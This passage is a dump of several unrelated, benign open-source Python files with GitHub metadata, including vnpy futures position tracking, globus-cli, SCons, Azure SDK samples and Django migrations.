elif trade.offset is OFFSET_CLOSEYESTERDAY:
self.shortYd -= trade.volume
# 平仓
elif trade.offset is OFFSET_CLOSE:
# 上期所等同于平昨
if self.exchange is EXCHANGE_SHFE:
self.shortYd -= trade.volume
# 非上期所,优先平今
else:
self.shortTd -= trade.volume
if self.shortTd < 0:
self.shortYd += self.shortTd
self.shortTd = 0
# 空头
elif trade.direction is DIRECTION_SHORT:
# 开仓
if trade.offset is OFFSET_OPEN:
self.shortTd += trade.volume
# 平今
elif trade.offset is OFFSET_CLOSETODAY:
self.longTd -= trade.volume
# 平昨
elif trade.offset is OFFSET_CLOSEYESTERDAY:
self.longYd -= trade.volume
# 平仓
elif trade.offset is OFFSET_CLOSE:
# 上期所等同于平昨
if self.exchange is EXCHANGE_SHFE:
self.longYd -= trade.volume
# 非上期所,优先平今
else:
self.longTd -= trade.volume
if self.longTd < 0:
self.longYd += self.longTd
self.longTd = 0
# 汇总
self.calculatePrice(trade)
self.calculatePosition()
self.calculatePnl()
#----------------------------------------------------------------------
def updateOrder(self, order):
"""委托更新"""
# 将活动委托缓存下来
if order.status in self.WORKING_STATUS:
self.workingOrderDict[order.vtOrderID] = order
# 移除缓存中已经完成的委托
else:
if order.vtOrderID in self.workingOrderDict:
del self.workingOrderDict[order.vtOrderID]
# 计算冻结
self.calculateFrozen()
#----------------------------------------------------------------------
def updatePosition(self, pos):
"""持仓更新"""
if pos.direction is DIRECTION_LONG:
self.longPos = pos.position
self.longYd = pos.ydPosition
self.longTd = self.longPos - self.longYd
self.longPnl = pos.positionProfit
self.longPrice = pos.price
elif pos.direction is DIRECTION_SHORT:
self.shortPos = pos.position
self.shortYd = pos.ydPosition
self.shortTd = self.shortPos - self.shortYd
self.shortPnl = pos.positionProfit
self.shortPrice = pos.price
#self.output()
#----------------------------------------------------------------------
def updateOrderReq(self, req, vtOrderID):
"""发单更新"""
vtSymbol = req.vtSymbol
# 基于请求生成委托对象
order = VtOrderData()
order.vtSymbol = vtSymbol
order.symbol = req.symbol
order.exchange = req.exchange
order.offset = req.offset
order.direction = req.direction
order.totalVolume = req.volume
order.status = STATUS_UNKNOWN
# 缓存到字典中
self.workingOrderDict[vtOrderID] = order
# 计算冻结量
self.calculateFrozen()
#----------------------------------------------------------------------
def updateTick(self, tick):
"""行情更新"""
self.lastPrice = tick.lastPrice
self.calculatePnl()
#----------------------------------------------------------------------
def calculatePnl(self):
"""计算持仓盈亏"""
self.longPnl = self.longPos * (self.lastPrice - self.longPrice) * self.size
self.shortPnl = self.shortPos * (self.shortPrice - self.lastPrice) * self.size
#----------------------------------------------------------------------
def calculatePrice(self, trade):
"""计算持仓均价(基于成交数据)"""
# 只有开仓会影响持仓均价
if trade.offset == OFFSET_OPEN:
if trade.direction == DIRECTION_LONG:
cost = self.longPrice * self.longPos
cost += trade.volume * trade.price
newPos = self.longPos + trade.volume
if newPos:
self.longPrice = cost / newPos
else:
self.longPrice = 0
else:
cost = self.shortPrice * self.shortPos
cost += trade.volume * trade.price
newPos = self.shortPos + trade.volume
if newPos:
self.shortPrice = cost / newPos
else:
self.shortPrice = 0
#----------------------------------------------------------------------
def calculatePosition(self):
"""计算持仓情况"""
self.longPos = self.longTd + self.longYd
self.shortPos = self.shortTd + self.shortYd
#----------------------------------------------------------------------
def calculateFrozen(self):
"""计算冻结情况"""
# 清空冻结数据
self.longPosFrozen = EMPTY_INT
self.longYdFrozen = EMPTY_INT
self.longTdFrozen = EMPTY_INT
self.shortPosFrozen = EMPTY_INT
self.shortYdFrozen = EMPTY_INT
self.shortTdFrozen = EMPTY_INT
# 遍历统计
for order in self.workingOrderDict.values():
# 计算剩余冻结量
frozenVolume = order.totalVolume - order.tradedVolume
# 多头委托
if order.direction is DIRECTION_LONG:
# 平今
if order.offset is OFFSET_CLOSETODAY:
self.shortTdFrozen += frozenVolume
# 平昨
elif order.offset is OFFSET_CLOSEYESTERDAY:
self.shortYdFrozen += frozenVolume
# 平仓
elif order.offset is OFFSET_CLOSE:
self.shortTdFrozen += frozenVolume
if self.shortTdFrozen > self.shortTd:
self.shortYdFrozen += (self.shortTdFrozen - self.shortTd)
self.shortTdFrozen = self.shortTd
# 空头委托
elif order.direction is DIRECTION_SHORT:
# 平今
if order.offset is OFFSET_CLOSETODAY:
self.longTdFrozen += frozenVolume
# 平昨
elif order.offset is OFFSET_CLOSEYESTERDAY:
self.longYdFrozen += frozenVolume
# 平仓
elif order.offset is OFFSET_CLOSE:
self.longTdFrozen += frozenVolume
if self.longTdFrozen > self.longTd:
self.longYdFrozen += (self.longTdFrozen - self.longTd)
self.longTdFrozen = self.longTd
# 汇总今昨冻结
self.longPosFrozen = self.longYdFrozen + self.longTdFrozen
self.shortPosFrozen = self.shortYdFrozen + self.shortTdFrozen
#----------------------------------------------------------------------
def output(self):
""""""
print self.vtSymbol, '-'*30
print 'long, total:%s, td:%s, yd:%s' %(self.longPos, self.longTd, self.longYd)
print 'long frozen, total:%s, td:%s, yd:%s' %(self.longPosFrozen, self.longTdFrozen, self.longYdFrozen)
print 'short, total:%s, td:%s, yd:%s' %(self.shortPos, self.shortTd, self.shortYd)
print 'short frozen, total:%s, td:%s, yd:%s' %(self.shortPosFrozen, self.shortTdFrozen, self.shortYdFrozen)
#----------------------------------------------------------------------
def convertOrderReq(self, req):
"""转换委托请求"""
# 普通模式无需转换
if self.mode is self.MODE_NORMAL:
return [req]
# 上期所模式拆分今昨,优先平今
elif self.mode is self.MODE_SHFE:
# 开仓无需转换
if req.offset is OFFSET_OPEN:
return [req]
# 多头
if req.direction is DIRECTION_LONG:
posAvailable = self.shortPos - self.shortPosFrozen
tdAvailable = self.shortTd- self.shortTdFrozen
ydAvailable = self.shortYd - self.shortYdFrozen
# 空头
else:
posAvailable = self.longPos - self.longPosFrozen
tdAvailable = self.longTd - self.longTdFrozen
ydAvailable = self.longYd - self.longYdFrozen
# 平仓量超过总可用,拒绝,返回空列表
if req.volume > posAvailable:
return []
# 平仓量小于今可用,全部平今
elif req.volume <= tdAvailable:
req.offset = OFFSET_CLOSETODAY
return [req]
# 平仓量大于今可用,平今再平昨
else:
l = []
if tdAvailable > 0:
reqTd = copy(req)
reqTd.offset = OFFSET_CLOSETODAY
reqTd.volume = tdAvailable
l.append(reqTd)
reqYd = copy(req)
reqYd.offset = OFFSET_CLOSEYESTERDAY
reqYd.volume = req.volume - tdAvailable
l.append(reqYd)
return l
# 平今惩罚模式,没有今仓则平昨,否则锁仓
elif self.mode is self.MODE_TDPENALTY:
# 多头
if req.direction is DIRECTION_LONG:
td = self.shortTd
ydAvailable = self.shortYd - self.shortYdFrozen
# 空头
else:
td = self.longTd
ydAvailable = self.longYd - self.longYdFrozen
# 这里针对开仓和平仓委托均使用一套逻辑
# 如果有今仓,则只能开仓(或锁仓)
if td:
req.offset = OFFSET_OPEN
return [req]
# 如果平仓量小于昨可用,全部平昨
elif req.volume <= ydAvailable:
if self.exchange is EXCHANGE_SHFE:
req.offset = OFFSET_CLOSEYESTERDAY
else:
req.offset = OFFSET_CLOSE
return [req]
# 平仓量大于昨可用,平仓再反向开仓
else:
l = []
if ydAvailable > 0:
reqClose = copy(req)
if self.exchange is EXCHANGE_SHFE:
reqClose.offset = OFFSET_CLOSEYESTERDAY
else:
reqClose.offset = OFFSET_CLOSE
reqClose.volume = ydAvailable
l.append(reqClose)
reqOpen = copy(req)
reqOpen.offset = OFFSET_OPEN
reqOpen.volume = req.volume - ydAvailable
l.append(reqOpen)
return l
# 其他情况则直接返回空
return [] | {
"content_hash": "f18e57b861a645f34d5670e514562197",
"timestamp": "",
"source": "github",
"line_count": 1069,
"max_line_length": 123,
"avg_line_length": 35.43966323666979,
"alnum_prop": 0.44104526857595355,
"repo_name": "wisfern/vnpy",
"id": "86168da35eca739d9e96d7f4a0a3c3b6b54fef83",
"size": "40798",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vnpy/trader/vtEngine.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "341"
},
{
"name": "C",
"bytes": "3151559"
},
{
"name": "C++",
"bytes": "8866606"
},
{
"name": "CMake",
"bytes": "44564"
},
{
"name": "HTML",
"bytes": "807"
},
{
"name": "Makefile",
"bytes": "99693"
},
{
"name": "Objective-C",
"bytes": "22505"
},
{
"name": "PHP",
"bytes": "4107"
},
{
"name": "Python",
"bytes": "5367161"
},
{
"name": "Shell",
"bytes": "3722"
}
],
"symlink_target": ""
} |
from apps.base.views import BaseView
from contracts.story import STORY_ID
from apps.base.views import _base_request
from logics.story.logic import StoryServiceAgent
from apps.story.mappers import (GetStoryRequestSchema, GetStoryResponseSchema,
DetailStoryRequestSchema, DetailStoryResponseSchema,
PostStoryRequestSchema, PostStoryResponseSchema,
PutStoryRequestSchema, PutStoryResponseSchema,
DeleteStoryRequestSchema, DeleteStoryResponseSchema)
class StorysView(BaseView):
def get(self, request):
return _base_request(request=request,
request_schema=GetStoryRequestSchema(),
response_schema=GetStoryResponseSchema(),
method=StoryServiceAgent.get_story,
is_paging=True)
def post(self, request):
return _base_request(request=request,
request_schema=PostStoryRequestSchema(),
response_schema=PostStoryResponseSchema(),
method=StoryServiceAgent.post_story)
class StoryView(BaseView):
def get(self, request, code):
return _base_request(request=request,
request_schema=DetailStoryRequestSchema(),
response_schema=DetailStoryResponseSchema(),
method=StoryServiceAgent.detail_story,
code=code,
code_name=STORY_ID)
def put(self, request, code):
return _base_request(request=request,
request_schema=PutStoryRequestSchema(),
response_schema=PutStoryResponseSchema(),
method=StoryServiceAgent.put_story,
code=code,
code_name=STORY_ID)
def delete(self, request, code):
return _base_request(request=request,
request_schema=DeleteStoryRequestSchema(),
response_schema=DeleteStoryResponseSchema(),
method=StoryServiceAgent.delete_story,
code=code,
code_name=STORY_ID)
| {
"content_hash": "61f06df96023566a6c8f192ae7b79d92",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 84,
"avg_line_length": 47.72,
"alnum_prop": 0.5456831517183571,
"repo_name": "tuanquanghpvn/rest_exam",
"id": "c5b92c19ca1be50652e77321a31e53241a97050e",
"size": "2386",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/story/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "51707"
}
],
"symlink_target": ""
} |
import time
import globus_sdk
from globus_cli.login_manager import (
LoginManager,
get_client_login,
internal_auth_client,
is_client_login,
token_storage_adapter,
)
from globus_cli.parsing import command
from globus_cli.termio import display, print_command_hint
@command(
"show",
short_help="Show your current CLI auth session",
adoc_output="""Note: this output will not show your primary identity if it is not
in session. For information on your identity set use 'globus whoami'.
When textual output is requested, the output will be a table with
the following fields:
- 'Username'
- 'ID'
- 'Auth Time'
When JSON output is requested the output will also have the session id
if needed.
""",
adoc_examples="""Display the current session with JSON output
[source,bash]
----
$ globus session show --format json
----
""",
)
@LoginManager.requires_login(LoginManager.AUTH_RS)
def session_show(*, login_manager):
"""List all identities in your current CLI auth session.
Lists identities that are in the session tied to the CLI's access tokens along with
the time the user authenticated with that identity.
"""
auth_client = login_manager.get_auth_client()
adapter = token_storage_adapter()
# get a token to introspect, refreshing if neccecary
try:
# may force a refresh if the token is expired
auth_client.authorizer.get_authorization_header()
except AttributeError: # if we have no RefreshTokenAuthorizor
pass
tokendata = adapter.get_token_data(LoginManager.AUTH_RS)
# if there's no token (e.g. not logged in), stub with empty data
if not tokendata:
session_info = {}
authentications = {}
else:
if is_client_login():
introspect_client = get_client_login()
else:
introspect_client = internal_auth_client()
access_token = tokendata["access_token"]
res = introspect_client.oauth2_token_introspect(
access_token, include="session_info"
)
session_info = res.get("session_info", {})
authentications = session_info.get("authentications") or {}
# resolve ids to human readable usernames
resolved_ids = globus_sdk.IdentityMap(auth_client, list(authentications))
# put the nested dicts in a format table output can work with
# while also converting vals into human readable formats
list_data = [
{
"id": key,
"username": resolved_ids.get(key, {}).get("username"),
"auth_time": time.strftime(
"%Y-%m-%d %H:%M %Z", time.localtime(vals["auth_time"])
),
}
for key, vals in authentications.items()
]
print_command_hint(
"For information on your primary identity or full identity set see\n"
" globus whoami\n"
)
display(
list_data,
json_converter=lambda x: session_info,
fields=[("Username", "username"), ("ID", "id"), ("Auth Time", "auth_time")],
)
| {
"content_hash": "be555636264b5f8f95edeb0671b0e6d6",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 87,
"avg_line_length": 30.04950495049505,
"alnum_prop": 0.6494233937397035,
"repo_name": "globus/globus-cli",
"id": "769ac1fc4b6ccc1b25136926ba0f98e2b94be4cf",
"size": "3035",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/globus_cli/commands/session/show.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jinja",
"bytes": "425"
},
{
"name": "Makefile",
"bytes": "764"
},
{
"name": "Python",
"bytes": "746729"
},
{
"name": "Shell",
"bytes": "776"
}
],
"symlink_target": ""
} |
"""SCons.Tool.hplink
Tool-specific initialization for the HP linker.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/hplink.py 3897 2009/01/13 06:45:54 scons"
import os
import os.path
import SCons.Util
import link
ccLinker = None
# search for the acc compiler and linker front end
try:
dirs = os.listdir('/opt')
except (IOError, OSError):
# Not being able to read the directory because it doesn't exist
# (IOError) or isn't readable (OSError) is okay.
dirs = []
for dir in dirs:
linker = '/opt/' + dir + '/bin/aCC'
if os.path.exists(linker):
ccLinker = linker
break
def generate(env):
"""
Add Builders and construction variables for Visual Age linker to
an Environment.
"""
link.generate(env)
env['LINKFLAGS'] = SCons.Util.CLVar('-Wl,+s -Wl,+vnocompatwarnings')
env['SHLINKFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -b')
env['SHLIBSUFFIX'] = '.sl'
def exists(env):
return ccLinker
| {
"content_hash": "932843c70ba6d57ab3f621951ec0ea45",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 89,
"avg_line_length": 32.014084507042256,
"alnum_prop": 0.7232732072151342,
"repo_name": "amyvmiwei/chromium",
"id": "da04010122edd3b2500250ad6add54b548af65c2",
"size": "2273",
"binary": false,
"copies": "3",
"ref": "refs/heads/trunk",
"path": "third_party/scons/scons-local/SCons/Tool/hplink.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""
tests a test set of data using a specified, pre0trained model and weights
"""
from __future__ import absolute_import, division, print_function
from ibeis_cnn import utils
import utool as ut
import six # NOQA
print, rrr, profile = ut.inject2(__name__, '[ibeis_cnn.test]')
def test(data_fpath, model, weights_fpath, results_dpath=None, labels_fpath=None, **kwargs):
"""
Driver function
Args:
data_fpath (?):
labels_fpath (?):
model (?):
weights_fpath (?):
"""
######################################################################################
# Load the data
print('\n[data] loading data...')
print('data_fpath = %r' % (data_fpath,))
X_test, y_test = utils.load(data_fpath, labels_fpath)
if len(X_test.shape) == 3:
# add channel dimension for implicit grayscale
X_test.shape = X_test.shape + (1,)
#return test_data(X_test, y_test, model, weights_fpath, results_dpath, **kwargs)
if __name__ == '__main__':
"""
CommandLine:
python -m ibeis_cnn.test
python -m ibeis_cnn.test --allexamples
python -m ibeis_cnn.test --allexamples --noface --nosrc
CommandLine:
cd %CODE_DIR%/ibies_cnn/code
cd $CODE_DIR/ibies_cnn/code
code
cd ibeis_cnn/code
python test.py
PythonPrereqs:
pip install theano
pip install git+https://github.com/Lasagne/Lasagne.git
pip install git+git://github.com/lisa-lab/pylearn2.git
#pip install lasagne
#pip install pylearn2
git clone git://github.com/lisa-lab/pylearn2.git
git clone https://github.com/Lasagne/Lasagne.git
cd pylearn2
python setup.py develop
cd ..
cd Lesagne
git checkout 8758ac1434175159e5c1f30123041799c2b6098a
python setup.py develop
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
| {
"content_hash": "6d297caa37b14051544f091ba55562ba",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 92,
"avg_line_length": 29.82089552238806,
"alnum_prop": 0.591091091091091,
"repo_name": "bluemellophone/ibeis_cnn",
"id": "74a2f1bb7dbb74776f65ca9135c0e0d26cd2c6ea",
"size": "2044",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ibeis_cnn/test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "667619"
},
{
"name": "Shell",
"bytes": "333"
}
],
"symlink_target": ""
} |
import os
import unittest
from nose.plugins.attrib import attr
from mi.core.log import get_logger
from mi.dataset.dataset_driver import ParticleDataHandler
from mi.dataset.driver.velpt_ab.dcl.resource import RESOURCE_PATH
from mi.dataset.driver.velpt_ab.dcl.velpt_ab_dcl_recovered_driver import parse
__author__ = 'Joe Padula'
log = get_logger()
@attr('UNIT', group='mi')
class SampleTest(unittest.TestCase):
def test_one(self):
source_file_path = os.path.join(RESOURCE_PATH, '20140813.velpt.log')
particle_data_handler = ParticleDataHandler()
particle_data_handler = parse(None, source_file_path, particle_data_handler)
log.debug("SAMPLES: %s", particle_data_handler._samples)
log.debug("FAILURE: %s", particle_data_handler._failure)
self.assertEquals(particle_data_handler._failure, False)
if __name__ == '__main__':
test = SampleTest('test_one')
test.test_one()
| {
"content_hash": "7de986e256521c56063120b55ce504c6",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 84,
"avg_line_length": 28.393939393939394,
"alnum_prop": 0.7075773745997865,
"repo_name": "petercable/mi-dataset",
"id": "253eb9592c31dc62afd36b0a56773e10d462957d",
"size": "960",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mi/dataset/driver/velpt_ab/dcl/test/test_velpt_ab_dcl_recovered_driver.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "3604713"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.apimanagement import ApiManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-apimanagement
# USAGE
python api_management_delete_api_diagnostic.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = ApiManagementClient(
credential=DefaultAzureCredential(),
subscription_id="subid",
)
response = client.api_diagnostic.delete(
resource_group_name="rg1",
service_name="apimService1",
api_id="57d1f7558aa04f15146d9d8a",
diagnostic_id="applicationinsights",
if_match="*",
)
print(response)
# x-ms-original-file: specification/apimanagement/resource-manager/Microsoft.ApiManagement/stable/2021-08-01/examples/ApiManagementDeleteApiDiagnostic.json
if __name__ == "__main__":
main()
| {
"content_hash": "1879f712a214f0749efeb001956873d6",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 155,
"avg_line_length": 33.52777777777778,
"alnum_prop": 0.7257663628831814,
"repo_name": "Azure/azure-sdk-for-python",
"id": "fed262e8b393ab4251c160f1bcc1fb83ec7afdc6",
"size": "1675",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/apimanagement/azure-mgmt-apimanagement/generated_samples/api_management_delete_api_diagnostic.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'pagepermission'
db.delete_table('pages_pagepermission')
def backwards(self, orm):
# Adding model 'pagepermission'
db.create_table('pages_pagepermission', (
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('type', self.gf('django.db.models.fields.IntegerField')(default=0)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['pages.Page'], null=True, blank=True)),
))
db.send_create_signal('pages', ['pagepermission'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 8, 19, 17, 37, 19, 123021)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 8, 19, 17, 37, 19, 122310)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'pages.content': {
'Meta': {'object_name': 'Content'},
'body': ('django.db.models.fields.TextField', [], {}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 8, 19, 17, 37, 19, 119785)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['pages.Page']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'pages.page': {
'Meta': {'ordering': "['tree_id', 'lft']", 'object_name': 'Page'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 8, 19, 17, 37, 19, 120711)'}),
'delegate_to': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'freeze_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modification_date': ('django.db.models.fields.DateTimeField', [], {}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['pages.Page']"}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'redirect_to': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'redirected_pages'", 'null': 'True', 'to': "orm['pages.Page']"}),
'redirect_to_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'pages.pagealias': {
'Meta': {'object_name': 'PageAlias'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['pages.Page']", 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
}
}
complete_apps = ['pages']
| {
"content_hash": "e259a440d8d30f47773b93ddb5e47c23",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 182,
"avg_line_length": 71.98,
"alnum_prop": 0.5543206446235065,
"repo_name": "pombredanne/django-page-cms-1",
"id": "174f299cbd6ad8692c6badd51a50c2ffa8e4279d",
"size": "7216",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pages/migrations/0003_auto__del_pagepermission.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "17296"
},
{
"name": "HTML",
"bytes": "29690"
},
{
"name": "JavaScript",
"bytes": "38245"
},
{
"name": "Python",
"bytes": "296427"
}
],
"symlink_target": ""
} |
from .config import get_config
from .models import IssueThread
from .utils import bugzilla_login, get_bugzilla_bug, validate_list
class Migrator:
def __init__(self, config_path):
self.conf = get_config(config_path)
def migrate(self, bug_list):
"""
Migrate a list of bug ids from Bugzilla to GitLab.
"""
validate_list(bug_list)
if self.conf.bugzilla_user:
bugzilla_login(self.conf.bugzilla_base_url, self.conf.bugzilla_user)
for bug in bug_list:
self.migrate_one(bug)
def migrate_one(self, bugzilla_bug_id):
"""
Migrate a single bug from Bugzilla to GitLab.
"""
print("Migrating bug {}".format(bugzilla_bug_id))
fields = get_bugzilla_bug(self.conf.bugzilla_base_url, bugzilla_bug_id)
issue_thread = IssueThread(self.conf, fields)
issue_thread.save()
| {
"content_hash": "50a1bccd1f2d9ce94b5f67960802ad57",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 80,
"avg_line_length": 33.370370370370374,
"alnum_prop": 0.6293007769145395,
"repo_name": "xmun0x/bugzilla2gitlab",
"id": "b1e565be887e6ff03724b4bfbb511ca607567475",
"size": "901",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bugzilla2gitlab/migrator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "27509"
},
{
"name": "Shell",
"bytes": "44"
}
],
"symlink_target": ""
} |
from neutron_lib.db import constants as db_const
from neutron_lib.db import model_base
import sqlalchemy as sa
class AddressScope(model_base.BASEV2, model_base.HasId, model_base.HasProject):
"""Represents a neutron address scope."""
__tablename__ = "address_scopes"
name = sa.Column(sa.String(db_const.NAME_FIELD_SIZE), nullable=False)
shared = sa.Column(sa.Boolean, nullable=False)
ip_version = sa.Column(sa.Integer(), nullable=False)
| {
"content_hash": "b038fcf0b4eef0714e50b86595180ec2",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 79,
"avg_line_length": 35.38461538461539,
"alnum_prop": 0.7304347826086957,
"repo_name": "noironetworks/neutron",
"id": "e3f08e668ef1403c01caf0b9d4e22d9858ebdddb",
"size": "1033",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "neutron/db/models/address_scope.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1047"
},
{
"name": "Python",
"bytes": "11420614"
},
{
